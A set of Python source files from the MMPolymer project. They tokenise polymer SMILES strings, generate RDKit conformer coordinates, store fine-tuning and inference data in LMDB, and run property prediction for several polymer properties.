return MurckoScaffold.MurckoScaffoldSmiles(
smiles=smi, includeChirality=True)
except:
print("failed to generate scaffold with smiles: {}".format(smi))
return smi
def smi2_2Dcoords(smi):
mol = Chem.MolFromSmiles(smi)
mol = AllChem.AddHs(mol)
AllChem.Compute2DCoords(mol)
coordinates = mol.GetConformer().GetPositions().astype(np.float32)
len(mol.GetAtoms()) == len(coordinates), "2D coordinates shape is not align with {}".format(smi)
return coordinates
def smi2_3Dcoords(smi,cnt):
mol = Chem.MolFromSmiles(smi)
mol = AllChem.AddHs(mol)
coordinate_list=[]
for seed in range(cnt):
try:
res = AllChem.EmbedMolecule(mol, randomSeed=seed) # will random generate conformer with seed equal to -1. else fixed random seed.
if res == 0:
try:
AllChem.MMFFOptimizeMolecule(mol) # some conformer can not use MMFF optimize
coordinates = mol.GetConformer().GetPositions()
except:
print("Failed to generate 3D, replace with 2D")
coordinates = smi2_2Dcoords(smi)
elif res == -1:
mol_tmp = Chem.MolFromSmiles(smi)
AllChem.EmbedMolecule(mol_tmp, maxAttempts=5000, randomSeed=seed)
mol_tmp = AllChem.AddHs(mol_tmp, addCoords=True)
try:
AllChem.MMFFOptimizeMolecule(mol_tmp) # some conformer can not use MMFF optimize
coordinates = mol_tmp.GetConformer().GetPositions()
except:
print("Failed to generate 3D, replace with 2D")
coordinates = smi2_2Dcoords(smi)
except:
print("Failed to generate 3D, replace with 2D")
coordinates = smi2_2Dcoords(smi)
assert len(mol.GetAtoms()) == len(coordinates), "3D coordinates shape is not align with {}".format(smi)
coordinate_list.append(coordinates.astype(np.float32))
return coordinate_list
def inner_smi2coords(content):
smi = content
target = -999
mol = Chem.MolFromSmiles(smi)
atoms = [atom.GetSymbol() for atom in mol.GetAtoms()]
assert 'H' not in atoms
star_atoms_id = []
for idx, atom_symbol in enumerate(atoms):
if atom_symbol == '*':
star_atoms_id.append(idx)
assert len(star_atoms_id) == 2, "Error star num"
star_pair_list = []
for star_id in star_atoms_id:
star_pair_list.append(star_id)
star_atom = mol.GetAtomWithIdx(star_id)
neighbors = star_atom.GetNeighbors()
assert len(neighbors) == 1, "Error star neighbors num"
for neighbor in neighbors:
star_pair_list.append(neighbor.GetIdx())
pair_1_star = star_pair_list[0]
pair_1 = star_pair_list[3]
atom = mol.GetAtomWithIdx(pair_1_star)
atom.SetAtomicNum(mol.GetAtomWithIdx(pair_1).GetAtomicNum())
pair_2_star = star_pair_list[2]
pair_2 = star_pair_list[1]
atom = mol.GetAtomWithIdx(pair_2_star)
atom.SetAtomicNum(mol.GetAtomWithIdx(pair_2).GetAtomicNum())
smi = Chem.MolToSmiles(mol)
cnt = 10
scaffold = smi2scaffold(smi)
if len(mol.GetAtoms()) > 400:
coordinate_list = [smi2_2Dcoords(smi)] * (cnt+1)
print("atom num > 400, use 2D coords",smi)
else:
coordinate_list = smi2_3Dcoords(smi, cnt)
coordinate_list.append(smi2_2Dcoords(smi).astype(np.float32))
mol = Chem.MolFromSmiles(smi)
mol = AllChem.AddHs(mol)
atoms = [atom.GetSymbol() for atom in mol.GetAtoms()]
origin_smi = content
origin_mol = Chem.MolFromSmiles(origin_smi)
origin_atoms = [atom.GetSymbol() for atom in origin_mol.GetAtoms()]
assert origin_atoms[pair_1_star] == '*'
assert origin_atoms[pair_2_star] == '*'
atoms[pair_1_star] = '*'
atoms[pair_2_star] = '*'
return {'atoms': atoms,
'coordinates': coordinate_list,
'mol':mol, 'smi': content, 'origin_smi': content, 'star_pair': star_pair_list, 'scaffold': scaffold, 'target': target}
def smi2coords(content):
try:
return inner_smi2coords(content)
except:
print("failed psmiles: {}".format(content))
return None
if __name__ == "__main__":
os.environ['MKL_THREADING_LAYER'] = 'GNU'
parser = argparse.ArgumentParser()
parser.add_argument("--input_data", help="PSMILES or CSV file")
parser.add_argument("--property", help="which property to predict", default='all')
parser.add_argument('--outputs_path', default='outputs')
parser.add_argument('--cache_path', default='cache')
args = parser.parse_args()
if os.path.exists(args.outputs_path):
shutil.rmtree(args.outputs_path)
os.mkdir(args.outputs_path)
if os.path.exists(args.cache_path):
shutil.rmtree(args.cache_path)
os.mkdir(args.cache_path)
# data pre
content_list = []
if args.input_data.endswith('.csv'):
with open(args.input_data, newline='', encoding='utf-8') as csvfile:
csvreader = csv.reader(csvfile)
headers = next(csvreader)
for row in csvreader:
psmi = row[0]
content_list.append(psmi)
else:
psmi = args.input_data
content_list.append(psmi)
outputfilename = os.path.join(args.cache_path, 'test.lmdb')
env = lmdb.open(
outputfilename,
subdir=False,
readonly=False,
lock=False,
readahead=False,
meminit=False,
max_readers=1,
map_size=int(1000e9),
)
txn = env.begin(write=True)
index = 0
tokenizer = PolymerSmilesTokenizer.from_pretrained("./MMPolymer/models/roberta-base", max_len=411)
for content in tqdm(content_list):
data_info = smi2coords(content)
if data_info == None:
continue
encoding = tokenizer(
str(data_info['origin_smi']),
add_special_tokens=True,
max_length=411,
return_token_type_ids=False,
padding="max_length",
truncation=True,
return_attention_mask=True,
return_tensors='pt',
)
data_info["input_ids"] = encoding["input_ids"].flatten()
data_info["attention_mask"] = encoding["attention_mask"].flatten()
assert data_info["input_ids"].shape[0] == 411
assert data_info["attention_mask"].shape[0] == 411
txn.put(f'{index}'.encode("ascii"), pickle.dumps(data_info, protocol=-1))
index += 1
txn.commit()
env.close()
# model run
if args.property != 'all':
property_list = [args.property]
else:
property_list = ['Egc', 'Egb', 'Eea', 'Ei', 'Xc', 'EPS', 'Nc', 'Eat']
total_psmi_list = []
total_pred_list = []
for property_name in property_list:
weight_path = f'./ckpt/${property_name}/checkpoint_best.pt'
cmd1 = f"python ./MMPolymer/infer.py --user-dir ./MMPolymer ./ --task-name {args.cache_path} --valid-subset test --results-path {args.cache_path} --num-workers 1 --ddp-backend=c10d --batch-size 128 --task MMPolymer_finetune --loss MMPolymer_finetune --arch MMPolymer_base --classification-head-name {args.cache_path} --num-classes 1 --dict-name dict.txt --conf-size 11 --only-polar 0 --path {weight_path} --fp16 --fp16-init-scale 4 --fp16-scale-window 256 --log-interval 50 --log-format simple"
process1 = subprocess.Popen(cmd1, shell=True)
process1.wait()
predict_result_path = f'./cache/{property_name}_test_cpu.out.pkl'
predict_outputs = pd.read_pickle(predict_result_path)
pred_list = []
psmi_list = []
for epoch in range(len(predict_outputs)):
predict_output = predict_outputs[epoch]
pred_list.append(predict_output['predict'])
psmi_list.extend(predict_output['smi_name'])
pred_list = torch.cat(pred_list, dim=0).float()
psmi_list = psmi_list[::11]
pred_list = pred_list.view(-1, 11).numpy().mean(axis=1)
pred_list = np.round(pred_list, 2)
total_psmi_list.append(psmi_list)
total_pred_list.append(pred_list)
transposed_total_pred_list = list(map(list, zip(*total_pred_list)))
results_data = transposed_total_pred_list
result_pd = pd.DataFrame(results_data, columns=property_list)
result_pd.insert(0, 'psmile', total_psmi_list[0])
predict_result_save_path = os.path.join(args.outputs_path, "predict_result.csv")
print(f'The final prediction result is saved in {predict_result_save_path}')
result_pd.to_csv(predict_result_save_path, index=None)
| 27,140 | Python | .py | 559 | 38.808587 | 504 | 0.622945 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,128 | finetune_data_process.py | FanmengWang_MMPolymer/dataset/finetune_data_process.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import os
import sys
import csv
import shutil
import pickle
import lmdb
import subprocess
import torch
import argparse
import pandas as pd
import numpy as np
from rdkit import Chem
from tqdm import tqdm
from rdkit import RDLogger
from rdkit.Chem import AllChem
from rdkit.Chem.Scaffolds import MurckoScaffold
import warnings
warnings.filterwarnings(action='ignore')
from multiprocessing import Pool
import json
import os
from functools import lru_cache
from typing import List, Optional, Tuple
import regex as re
from transformers import AddedToken, PreTrainedTokenizer
import logging
from transformers import RobertaTokenizer
logger = logging.getLogger(__name__)
VOCAB_FILES_NAMES = {
"vocab_file": "vocab.json",
"merges_file": "merges.txt",
}
PRETRAINED_VOCAB_FILES_MAP = {
"vocab_file": {
"roberta-base": "https://huggingface.co/roberta-base/resolve/main/vocab.json",
"roberta-large": "https://huggingface.co/roberta-large/resolve/main/vocab.json",
"roberta-large-mnli": "https://huggingface.co/roberta-large-mnli/resolve/main/vocab.json",
"distilroberta-base": "https://huggingface.co/distilroberta-base/resolve/main/vocab.json",
"roberta-base-openai-detector": "https://huggingface.co/roberta-base-openai-detector/resolve/main/vocab.json",
"roberta-large-openai-detector": "https://huggingface.co/roberta-large-openai-detector/resolve/main/vocab.json",
},
"merges_file": {
"roberta-base": "https://huggingface.co/roberta-base/resolve/main/merges.txt",
"roberta-large": "https://huggingface.co/roberta-large/resolve/main/merges.txt",
"roberta-large-mnli": "https://huggingface.co/roberta-large-mnli/resolve/main/merges.txt",
"distilroberta-base": "https://huggingface.co/distilroberta-base/resolve/main/merges.txt",
"roberta-base-openai-detector": "https://huggingface.co/roberta-base-openai-detector/resolve/main/merges.txt",
"roberta-large-openai-detector": "https://huggingface.co/roberta-large-openai-detector/resolve/main/merges.txt",
},
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
"roberta-base": 512,
"roberta-large": 512,
"roberta-large-mnli": 512,
"distilroberta-base": 512,
"roberta-base-openai-detector": 512,
"roberta-large-openai-detector": 512,
}
@lru_cache()
def bytes_to_unicode():
"""
Returns list of utf-8 byte and a mapping to unicode strings. We specifically avoids mapping to whitespace/control
characters the bpe code barfs on.
The reversible bpe codes work on unicode strings. This means you need a large # of unicode characters in your vocab
if you want to avoid UNKs. When you're at something like a 10B token dataset you end up needing around 5K for
decent coverage. This is a significant percentage of your normal, say, 32K bpe vocab. To avoid that, we want lookup
tables between utf-8 bytes and unicode strings.
"""
bs = (
list(range(ord("!"), ord("~") + 1)) + list(range(ord("¡"), ord("¬") + 1)) + list(range(ord("®"), ord("ÿ") + 1))
)
cs = bs[:]
n = 0
for b in range(2**8):
if b not in bs:
bs.append(b)
cs.append(2**8 + n)
n += 1
cs = [chr(n) for n in cs]
return dict(zip(bs, cs))
def get_pairs(word):
"""
Return set of symbol pairs in a word.
Word is represented as tuple of symbols (symbols being variable-length strings).
"""
pairs = set()
prev_char = word[0]
for char in word[1:]:
pairs.add((prev_char, char))
prev_char = char
return pairs
class PolymerSmilesTokenizer(PreTrainedTokenizer):
"""Adapt Roberta Tokenizer to PolymerSmilesTokenzier"""
"""
Original Comments:
Constructs a RoBERTa tokenizer, derived from the GPT-2 tokenizer, using byte-level Byte-Pair-Encoding.
This tokenizer has been trained to treat spaces like parts of the tokens (a bit like sentencepiece) so a word will
be encoded differently whether it is at the beginning of the sentence (without space) or not:
```
#>>> from transformers import RobertaTokenizer
#>>> tokenizer = RobertaTokenizer.from_pretrained("roberta-base")
#>>> tokenizer("Hello world")['input_ids']
[0, 31414, 232, 328, 2]
#>>> tokenizer(" Hello world")['input_ids']
[0, 20920, 232, 2]
```
You can get around that behavior by passing `add_prefix_space=True` when instantiating this tokenizer or when you
call it on some text, but since the model was not pretrained this way, it might yield a decrease in performance.
<Tip>
When used with `is_split_into_words=True`, this tokenizer will add a space before each word (even the first one).
</Tip>
This tokenizer inherits from [`PreTrainedTokenizer`] which contains most of the main methods. Users should refer to
this superclass for more information regarding those methods.
Args:
vocab_file (`str`):
Path to the vocabulary file.
merges_file (`str`):
Path to the merges file.
errors (`str`, *optional*, defaults to `"replace"`):
Paradigm to follow when decoding bytes to UTF-8. See
[bytes.decode](https://docs.python.org/3/library/stdtypes.html#bytes.decode) for more information.
bos_token (`str`, *optional*, defaults to `"<s>"`):
The beginning of sequence token that was used during pretraining. Can be used a sequence classifier token.
<Tip>
When building a sequence using special tokens, this is not the token that is used for the beginning of
sequence. The token used is the `cls_token`.
</Tip>
eos_token (`str`, *optional*, defaults to `"</s>"`):
The end of sequence token.
<Tip>
When building a sequence using special tokens, this is not the token that is used for the end of sequence.
The token used is the `sep_token`.
</Tip>
sep_token (`str`, *optional*, defaults to `"</s>"`):
The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
sequence classification or for a text and a question for question answering. It is also used as the last
token of a sequence built with special tokens.
cls_token (`str`, *optional*, defaults to `"<s>"`):
The classifier token which is used when doing sequence classification (classification of the whole sequence
instead of per-token classification). It is the first token of the sequence when built with special tokens.
unk_token (`str`, *optional*, defaults to `"<unk>"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
pad_token (`str`, *optional*, defaults to `"<pad>"`):
The token used for padding, for example when batching sequences of different lengths.
mask_token (`str`, *optional*, defaults to `"<mask>"`):
The token used for masking values. This is the token used when training this model with masked language
modeling. This is the token which the model will try to predict.
add_prefix_space (`bool`, *optional*, defaults to `False`):
Whether or not to add an initial space to the input. This allows to treat the leading word just as any
other word. (RoBERTa tokenizer detect beginning of words by the preceding space).
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
model_input_names = ["input_ids", "attention_mask"]
def __init__(
self,
vocab_file,
merges_file,
errors="replace",
bos_token="<s>",
eos_token="</s>",
sep_token="</s>",
cls_token="<s>",
unk_token="<unk>",
pad_token="<pad>",
mask_token="<mask>",
add_prefix_space=False,
**kwargs
):
bos_token = AddedToken(bos_token, lstrip=False, rstrip=False) if isinstance(bos_token, str) else bos_token
eos_token = AddedToken(eos_token, lstrip=False, rstrip=False) if isinstance(eos_token, str) else eos_token
sep_token = AddedToken(sep_token, lstrip=False, rstrip=False) if isinstance(sep_token, str) else sep_token
cls_token = AddedToken(cls_token, lstrip=False, rstrip=False) if isinstance(cls_token, str) else cls_token
unk_token = AddedToken(unk_token, lstrip=False, rstrip=False) if isinstance(unk_token, str) else unk_token
pad_token = AddedToken(pad_token, lstrip=False, rstrip=False) if isinstance(pad_token, str) else pad_token
# Mask token behave like a normal word, i.e. include the space before it
mask_token = AddedToken(mask_token, lstrip=True, rstrip=False) if isinstance(mask_token, str) else mask_token
super().__init__(
errors=errors,
bos_token=bos_token,
eos_token=eos_token,
unk_token=unk_token,
sep_token=sep_token,
cls_token=cls_token,
pad_token=pad_token,
mask_token=mask_token,
add_prefix_space=add_prefix_space,
**kwargs,
)
with open(vocab_file, encoding="utf-8") as vocab_handle:
self.encoder = json.load(vocab_handle)
self.decoder = {v: k for k, v in self.encoder.items()}
self.errors = errors # how to handle errors in decoding
self.byte_encoder = bytes_to_unicode()
self.byte_decoder = {v: k for k, v in self.byte_encoder.items()}
with open(merges_file, encoding="utf-8") as merges_handle:
bpe_merges = merges_handle.read().split("\n")[1:-1]
bpe_merges = [tuple(merge.split()) for merge in bpe_merges]
self.bpe_ranks = dict(zip(bpe_merges, range(len(bpe_merges))))
self.cache = {}
self.add_prefix_space = add_prefix_space
# Should have added re.IGNORECASE so BPE merges can happen for capitalized versions of contractions
"""Regex for SMILES"""
smi_regex_pattern = r"(\-?[0-9]+\.?[0-9]*|\[|\]|SELF|Li|Be|Na|Mg|Al|K|Ca|Co|Zn|Ga|Ge|As|Se|Sn|Te|N|O|P|H|I|b|c|n|o|s|p|Br?|Cl?|Fe?|Ni?|Si?|\||\(|\)|\^|=|#|-|\+|\\|\/|@|\*|\.|\%|\$)"
self.pat = re.compile(smi_regex_pattern)
@property
def vocab_size(self):
return len(self.encoder)
def get_vocab(self):
return dict(self.encoder, **self.added_tokens_encoder)
def bpe(self, token):
if token in self.cache:
return self.cache[token]
word = tuple(token)
pairs = get_pairs(word)
if not pairs:
return token
while True:
bigram = min(pairs, key=lambda pair: self.bpe_ranks.get(pair, float("inf")))
if bigram not in self.bpe_ranks:
break
first, second = bigram
new_word = []
i = 0
while i < len(word):
try:
j = word.index(first, i)
except ValueError:
new_word.extend(word[i:])
break
else:
new_word.extend(word[i:j])
i = j
if word[i] == first and i < len(word) - 1 and word[i + 1] == second:
new_word.append(first + second)
i += 2
else:
new_word.append(word[i])
i += 1
new_word = tuple(new_word)
word = new_word
if len(word) == 1:
break
else:
pairs = get_pairs(word)
word = " ".join(word)
self.cache[token] = word
return word
def _tokenize(self, text):
"""Tokenize a string."""
bpe_tokens = []
for token in re.findall(self.pat, text):
token = "".join(
self.byte_encoder[b] for b in token.encode("utf-8")
) # Maps all our bytes to unicode strings, avoiding control tokens of the BPE (spaces in our case)
bpe_tokens.extend(bpe_token for bpe_token in self.bpe(token).split(" "))
return bpe_tokens
def _convert_token_to_id(self, token):
"""Converts a token (str) in an id using the vocab."""
return self.encoder.get(token, self.encoder.get(self.unk_token))
def _convert_id_to_token(self, index):
"""Converts an index (integer) in a token (str) using the vocab."""
return self.decoder.get(index)
def convert_tokens_to_string(self, tokens):
"""Converts a sequence of tokens (string) in a single string."""
text = "".join(tokens)
text = bytearray([self.byte_decoder[c] for c in text]).decode("utf-8", errors=self.errors)
return text
def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
if not os.path.isdir(save_directory):
logger.error(f"Vocabulary path ({save_directory}) should be a directory")
return
vocab_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["vocab_file"]
)
merge_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["merges_file"]
)
with open(vocab_file, "w", encoding="utf-8") as f:
f.write(json.dumps(self.encoder, ensure_ascii=False))
index = 0
with open(merge_file, "w", encoding="utf-8") as writer:
writer.write("#version: 0.2\n")
for bpe_tokens, token_index in sorted(self.bpe_ranks.items(), key=lambda kv: kv[1]):
if index != token_index:
logger.warning(
f"Saving vocabulary to {merge_file}: BPE merge indices are not consecutive."
" Please check that the tokenizer is not corrupted!"
)
index = token_index
writer.write(" ".join(bpe_tokens) + "\n")
index += 1
return vocab_file, merge_file
def build_inputs_with_special_tokens(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
adding special tokens. A RoBERTa sequence has the following format:
- single sequence: `<s> X </s>`
- pair of sequences: `<s> A </s></s> B </s>`
Args:
token_ids_0 (`List[int]`):
List of IDs to which the special tokens will be added.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of [input IDs](../glossary#input-ids) with the appropriate special tokens.
"""
if token_ids_1 is None:
return [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
cls = [self.cls_token_id]
sep = [self.sep_token_id]
return cls + token_ids_0 + sep + sep + token_ids_1 + sep
def get_special_tokens_mask(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None, already_has_special_tokens: bool = False
) -> List[int]:
"""
Retrieve sequence ids from a token list that has no special tokens added. This method is called when adding
special tokens using the tokenizer `prepare_for_model` method.
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
already_has_special_tokens (`bool`, *optional*, defaults to `False`):
Whether or not the token list is already formatted with special tokens for the model.
Returns:
`List[int]`: A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token.
"""
if already_has_special_tokens:
return super().get_special_tokens_mask(
token_ids_0=token_ids_0, token_ids_1=token_ids_1, already_has_special_tokens=True
)
if token_ids_1 is None:
return [1] + ([0] * len(token_ids_0)) + [1]
return [1] + ([0] * len(token_ids_0)) + [1, 1] + ([0] * len(token_ids_1)) + [1]
def create_token_type_ids_from_sequences(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Create a mask from the two sequences passed to be used in a sequence-pair classification task. RoBERTa does not
make use of token type ids, therefore a list of zeros is returned.
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of zeros.
"""
sep = [self.sep_token_id]
cls = [self.cls_token_id]
if token_ids_1 is None:
return len(cls + token_ids_0 + sep) * [0]
return len(cls + token_ids_0 + sep + sep + token_ids_1 + sep) * [0]
def prepare_for_tokenization(self, text, is_split_into_words=False, **kwargs):
add_prefix_space = kwargs.pop("add_prefix_space", self.add_prefix_space)
if (is_split_into_words or add_prefix_space) and (len(text) > 0 and not text[0].isspace()):
text = " " + text
return (text, kwargs)
def smi2scaffold(smi):
try:
return MurckoScaffold.MurckoScaffoldSmiles(
smiles=smi, includeChirality=True)
except:
print("failed to generate scaffold with smiles: {}".format(smi))
return smi
def smi2_2Dcoords(smi):
mol = Chem.MolFromSmiles(smi)
mol = AllChem.AddHs(mol)
AllChem.Compute2DCoords(mol)
coordinates = mol.GetConformer().GetPositions().astype(np.float32)
len(mol.GetAtoms()) == len(coordinates), "2D coordinates shape is not align with {}".format(smi)
return coordinates
def smi2_3Dcoords(smi,cnt):
mol = Chem.MolFromSmiles(smi)
mol = AllChem.AddHs(mol)
coordinate_list=[]
for seed in range(cnt):
try:
res = AllChem.EmbedMolecule(mol, randomSeed=seed) # will random generate conformer with seed equal to -1. else fixed random seed.
if res == 0:
try:
AllChem.MMFFOptimizeMolecule(mol) # some conformer can not use MMFF optimize
coordinates = mol.GetConformer().GetPositions()
except:
print("Failed to generate 3D, replace with 2D")
coordinates = smi2_2Dcoords(smi)
elif res == -1:
mol_tmp = Chem.MolFromSmiles(smi)
AllChem.EmbedMolecule(mol_tmp, maxAttempts=5000, randomSeed=seed)
mol_tmp = AllChem.AddHs(mol_tmp, addCoords=True)
try:
AllChem.MMFFOptimizeMolecule(mol_tmp) # some conformer can not use MMFF optimize
coordinates = mol_tmp.GetConformer().GetPositions()
except:
print("Failed to generate 3D, replace with 2D")
coordinates = smi2_2Dcoords(smi)
except:
print("Failed to generate 3D, replace with 2D")
coordinates = smi2_2Dcoords(smi)
assert len(mol.GetAtoms()) == len(coordinates), "3D coordinates shape is not align with {}".format(smi)
coordinate_list.append(coordinates.astype(np.float32))
return coordinate_list
def inner_smi2coords(content):
smi = content[0]
target = content[1]
mol = Chem.MolFromSmiles(smi)
atoms = [atom.GetSymbol() for atom in mol.GetAtoms()]
assert 'H' not in atoms
star_atoms_id = []
for idx, atom_symbol in enumerate(atoms):
if atom_symbol == '*':
star_atoms_id.append(idx)
assert len(star_atoms_id) == 2, "Error star num"
star_pair_list = []
for star_id in star_atoms_id:
star_pair_list.append(star_id)
star_atom = mol.GetAtomWithIdx(star_id)
neighbors = star_atom.GetNeighbors()
assert len(neighbors) == 1, "Error star neighbors num"
for neighbor in neighbors:
star_pair_list.append(neighbor.GetIdx())
pair_1_star = star_pair_list[0]
pair_1 = star_pair_list[3]
atom = mol.GetAtomWithIdx(pair_1_star)
atom.SetAtomicNum(mol.GetAtomWithIdx(pair_1).GetAtomicNum())
pair_2_star = star_pair_list[2]
pair_2 = star_pair_list[1]
atom = mol.GetAtomWithIdx(pair_2_star)
atom.SetAtomicNum(mol.GetAtomWithIdx(pair_2).GetAtomicNum())
smi = Chem.MolToSmiles(mol)
cnt = 10
scaffold = smi2scaffold(smi)
if len(mol.GetAtoms()) > 400:
coordinate_list = [smi2_2Dcoords(smi)] * (cnt+1)
print("atom num > 400, use 2D coords",smi)
else:
coordinate_list = smi2_3Dcoords(smi, cnt)
coordinate_list.append(smi2_2Dcoords(smi).astype(np.float32))
mol = Chem.MolFromSmiles(smi)
mol = AllChem.AddHs(mol)
atoms = [atom.GetSymbol() for atom in mol.GetAtoms()]
origin_smi = content[0]
origin_mol = Chem.MolFromSmiles(origin_smi)
origin_atoms = [atom.GetSymbol() for atom in origin_mol.GetAtoms()]
assert origin_atoms[pair_1_star] == '*'
assert origin_atoms[pair_2_star] == '*'
atoms[pair_1_star] = '*'
atoms[pair_2_star] = '*'
return {'atoms': atoms,
'coordinates': coordinate_list,
'mol':mol, 'smi': smi, 'origin_smi': content[0], 'star_pair': star_pair_list, 'scaffold': scaffold, 'target': target}
def smi2coords(content):
try:
return inner_smi2coords(content)
except:
print("failed psmiles: {}".format(content[0]))
return None
if __name__ == "__main__":
tokenizer = PolymerSmilesTokenizer.from_pretrained("../MMPolymer/models/roberta-base", max_len=411)
data_list = ["Egc", "Egb", "Eea", "Ei", "Xc", "EPS", "Nc", "Eat"]
for data_name in data_list:
save_path = f'./finetune_data/{data_name}'
os.makedirs(save_path, exist_ok=True)
content_list = []
with open(f'./data/{data_name}.csv', newline='', encoding='utf-8') as csvfile:
csvreader = csv.reader(csvfile)
headers = next(csvreader)
for row in csvreader:
if "*" not in row[0]:
continue
content_list.append(row)
env = lmdb.open(
os.path.join(save_path, f'{data_name}.lmdb'),
subdir=False,
readonly=False,
lock=False,
readahead=False,
meminit=False,
max_readers=1,
map_size=int(100e9),
)
txn = env.begin(write=True)
index = 0
for content in tqdm(content_list):
data_info = smi2coords(content)
if data_info == None:
continue
encoding = tokenizer(
str(data_info['origin_smi']),
add_special_tokens=True,
max_length=411,
return_token_type_ids=False,
padding="max_length",
truncation=True,
return_attention_mask=True,
return_tensors='pt',
)
data_info["input_ids"] = encoding["input_ids"].flatten()
data_info["attention_mask"] = encoding["attention_mask"].flatten()
assert data_info["input_ids"].shape[0] == 411
assert data_info["attention_mask"].shape[0] == 411
txn.put(f'{index}'.encode("ascii"), pickle.dumps(data_info, protocol=-1))
index += 1
txn.commit()
env.close()
print(f'finetune_data_{data_name}, total_num:{index}')
| 24,630 | Python | .py | 513 | 37.990253 | 189 | 0.613556 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,129 | pretrain_data_process.py | FanmengWang_MMPolymer/dataset/pretrain_data_process.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import os
import sys
import csv
import shutil
import pickle
import lmdb
import subprocess
import torch
import argparse
import pandas as pd
import numpy as np
from rdkit import Chem
from tqdm import tqdm
from rdkit import RDLogger
from rdkit.Chem import AllChem
from rdkit.Chem.Scaffolds import MurckoScaffold
import warnings
warnings.filterwarnings(action='ignore')
from multiprocessing import Pool
import json
import os
from functools import lru_cache
from typing import List, Optional, Tuple
import regex as re
from transformers import AddedToken, PreTrainedTokenizer
import logging
from transformers import RobertaTokenizer
logger = logging.getLogger(__name__)
VOCAB_FILES_NAMES = {
"vocab_file": "vocab.json",
"merges_file": "merges.txt",
}
PRETRAINED_VOCAB_FILES_MAP = {
"vocab_file": {
"roberta-base": "https://huggingface.co/roberta-base/resolve/main/vocab.json",
"roberta-large": "https://huggingface.co/roberta-large/resolve/main/vocab.json",
"roberta-large-mnli": "https://huggingface.co/roberta-large-mnli/resolve/main/vocab.json",
"distilroberta-base": "https://huggingface.co/distilroberta-base/resolve/main/vocab.json",
"roberta-base-openai-detector": "https://huggingface.co/roberta-base-openai-detector/resolve/main/vocab.json",
"roberta-large-openai-detector": "https://huggingface.co/roberta-large-openai-detector/resolve/main/vocab.json",
},
"merges_file": {
"roberta-base": "https://huggingface.co/roberta-base/resolve/main/merges.txt",
"roberta-large": "https://huggingface.co/roberta-large/resolve/main/merges.txt",
"roberta-large-mnli": "https://huggingface.co/roberta-large-mnli/resolve/main/merges.txt",
"distilroberta-base": "https://huggingface.co/distilroberta-base/resolve/main/merges.txt",
"roberta-base-openai-detector": "https://huggingface.co/roberta-base-openai-detector/resolve/main/merges.txt",
"roberta-large-openai-detector": "https://huggingface.co/roberta-large-openai-detector/resolve/main/merges.txt",
},
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
"roberta-base": 512,
"roberta-large": 512,
"roberta-large-mnli": 512,
"distilroberta-base": 512,
"roberta-base-openai-detector": 512,
"roberta-large-openai-detector": 512,
}
@lru_cache()
def bytes_to_unicode():
"""
Returns list of utf-8 byte and a mapping to unicode strings. We specifically avoids mapping to whitespace/control
characters the bpe code barfs on.
The reversible bpe codes work on unicode strings. This means you need a large # of unicode characters in your vocab
if you want to avoid UNKs. When you're at something like a 10B token dataset you end up needing around 5K for
decent coverage. This is a significant percentage of your normal, say, 32K bpe vocab. To avoid that, we want lookup
tables between utf-8 bytes and unicode strings.
"""
bs = (
list(range(ord("!"), ord("~") + 1)) + list(range(ord("¡"), ord("¬") + 1)) + list(range(ord("®"), ord("ÿ") + 1))
)
cs = bs[:]
n = 0
for b in range(2**8):
if b not in bs:
bs.append(b)
cs.append(2**8 + n)
n += 1
cs = [chr(n) for n in cs]
return dict(zip(bs, cs))
def get_pairs(word):
"""
Return set of symbol pairs in a word.
Word is represented as tuple of symbols (symbols being variable-length strings).
"""
pairs = set()
prev_char = word[0]
for char in word[1:]:
pairs.add((prev_char, char))
prev_char = char
return pairs
class PolymerSmilesTokenizer(PreTrainedTokenizer):
"""Adapt Roberta Tokenizer to PolymerSmilesTokenzier"""
"""
Original Comments:
Constructs a RoBERTa tokenizer, derived from the GPT-2 tokenizer, using byte-level Byte-Pair-Encoding.
This tokenizer has been trained to treat spaces like parts of the tokens (a bit like sentencepiece) so a word will
be encoded differently whether it is at the beginning of the sentence (without space) or not:
```
#>>> from transformers import RobertaTokenizer
#>>> tokenizer = RobertaTokenizer.from_pretrained("roberta-base")
#>>> tokenizer("Hello world")['input_ids']
[0, 31414, 232, 328, 2]
#>>> tokenizer(" Hello world")['input_ids']
[0, 20920, 232, 2]
```
You can get around that behavior by passing `add_prefix_space=True` when instantiating this tokenizer or when you
call it on some text, but since the model was not pretrained this way, it might yield a decrease in performance.
<Tip>
When used with `is_split_into_words=True`, this tokenizer will add a space before each word (even the first one).
